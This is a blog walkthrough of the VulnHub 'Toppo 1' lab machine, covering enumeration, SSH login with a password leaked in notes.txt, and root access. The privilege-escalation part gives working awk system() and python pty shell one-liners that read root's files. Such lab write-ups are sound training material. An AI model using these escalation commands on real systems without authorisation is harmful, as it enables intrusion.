Toppo 1 | Walkthrough | VulnHub


This is the latest machine in VulnHub , created by Hadi Mene .





So let's begin enumeration with Nmap.



Meanwhile I was looking into the source code to get some information, but nothing special was there.

So I fired up the Dirb to look into the hidden directories. Below is the output of Dirb. So I started looking into all these directories.



While browsing through directories, in admin directory i found notes.txt file. Below is the output for the same.




So in notes.txt, I found this note :

 "Note to myself :

I need to change my password :/ 12345ted123 is too outdated but the technology isn't my thing i prefer go fishing or watching soccer."


As we know, while enumeration with Nmap, we found that port 22 and 80 is open. So ssh is possible here, here I took "ted" as username (Predicted) and "12345ted123" as password.

And it worked. So what's next??





We got successful login, and now let's move for the post exploitation.

So i started checking the directories




After checking I found nothing here. So I decided to check the Sudoers (Privilege Users)



As we can see here ted user can execute the awk file without any credentials, and also this machines covers the basic privilege escalation part through SUID.

Syntax : awk 'BEGIN {system("command")}' --> with the help of awk we can execute system commands.

If you are not familiar with SUID, follow the referred article and for privilege escalation through awk follow this article.



After executing the following commands, I got the Flag.

ted@Toppo:/tmp$ awk 'BEGIN {system("whoami")}'
root
ted@Toppo:/tmp$ awk 'BEGIN {system("ls -la /root")}'
total 24
drwx------  2 root root 4096 Apr 15 11:40 .
drwxr-xr-x 21 root root 4096 Apr 15 10:02 ..
-rw-------  1 root root   53 Apr 15 12:28 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root  397 Apr 15 10:19 flag.txt
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
ted@Toppo:/tmp$ awk 'BEGIN {system("cat /root/flag.txt")}'
_________                                 
|  _   _  |                               
|_/ | | \_|.--.   _ .--.   _ .--.    .--. 
    | |  / .'`\ \[ '/'`\ \[ '/'`\ \/ .'`\ \
   _| |_ | \__. | | \__/ | | \__/ || \__. |
  |_____| '.__.'  | ;.__/  | ;.__/  '.__.' 
                 [__|     [__|             




Congratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}



You can also go with this method,


ted@Toppo:~$ python2.7 -c 'import pty;pty.spawn("/bin/sh")'
# whoami
root
# ls
# ls -al
total 24
drwxr-xr-x 2 ted  ted  4096 Apr 15 11:19 .
drwxr-xr-x 3 root root 4096 Apr 15 10:08 ..
-rw------- 1 ted  ted    55 Jul 23 04:02 .bash_history
-rw-r--r-- 1 ted  ted   220 Apr 15 10:08 .bash_logout
-rw-r--r-- 1 ted  ted  3515 Apr 15 10:08 .bashrc
-rw-r--r-- 1 ted  ted   675 Apr 15 10:08 .profile
# cat /root/flag.txt



Thanks for the reading.


Comments

Post a Comment

Popular posts from this blog

Source Code Review

Image
Introduction Source Code review is a process which discovers hidden vulnerabilities, design flaws, and verifies if key security controls are implemented. Code review helps developers learn the code base, as well as help them learn new technologies and techniques that grow their skill sets. In source code review we are using a combination of scanning tools and manual review to detect insecure coding practices, backdoor, injection flaws, cross site scripting errors, insecure handling of resources, weak cryptography etc. Many claims that this process is time consuming and too costly, but there is no doubt that this process is the fastest and most accurate way to find and diagnose many problems, mostly your code is the base from hackers are taking advantage. There are dozens of security problems that simply can’t be found any other way. A source code review is also the best way to detect intentional or accidental backdoors and logic bombs in applications that you acquire from thi
Read more

Cyber Security and DFIR Interview Questions

Cyber Security is an exotic field, and every next person wants to explore this domain and make a career in it, but the problem is they have no idea how to get in and even if they do, They don't have any idea on what type of questions they might face in an interview. Recently  @Miss_Malware  asked for everyone's favorites security analyst and DFIR interview question that gave me an idea to compile a list of questions which are asked in every interview one way or another. What follows is a list of questions which you may face in an interview. Note: All These questions have compiled with the help of @Miss_Malware's twitter thread, contribution from friends and very intelligent internet searches :P, All the relevant sources (Read those I remember) have been mentioned at end of the post. GENERAL What is DNS? Differentiate between TCP and UDP? How does HTTP handle state? Does TLS use symmetric or asymmetric encryption? What is "Risk"? What is "Risk
Read more